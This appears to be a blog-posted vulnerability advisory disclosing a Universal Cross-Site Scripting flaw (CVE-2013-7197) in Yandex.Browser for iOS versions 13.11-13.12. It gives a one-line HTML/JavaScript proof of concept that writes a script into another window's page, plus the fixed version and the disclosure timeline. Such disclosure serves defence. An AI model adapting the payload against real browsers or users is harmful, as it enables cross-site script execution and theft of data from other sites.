# Vulnerability: Yandex.Browser for iOS - Universal Cross-Site Scripting
# Software Link: https://itunes.apple.com/us/app/yandex.browser/id574939428
# Vulnerable versions: 13.11-13.12
# CVE: CVE-2013-7197
# Author: Lukasz Pilorz
# http://browser-shredders.blogspot.com
1. Vulnerability
Yandex.Browser for iOS was vulnerable to Universal Cross-Site Scripting attacks, allowing a webpage to execute JavaScript on any other webpage, requiring minimal user interaction.
2. Proof of Concept
<button onclick="w=window.open('redirect.php?http://example.com');setTimeout(function(){w.document.write('<script>alert(location)</script>')},5000);">Click</button>
3. Fix
This issue was fixed in version 14.02.
4. Timeline
14.12.2013 - initial contact, multiple issues reported
27.12.2013 - Yandex response, additional data provided proving the issue is in Yandex code and not in Apple's API
10.01.2014 - Yandex confirmation and bug bounty award
24.02.2014 - version 14.02 released
30.05.2014 - public disclosure
No comments:
Post a Comment
Note: only a member of this blog may post a comment.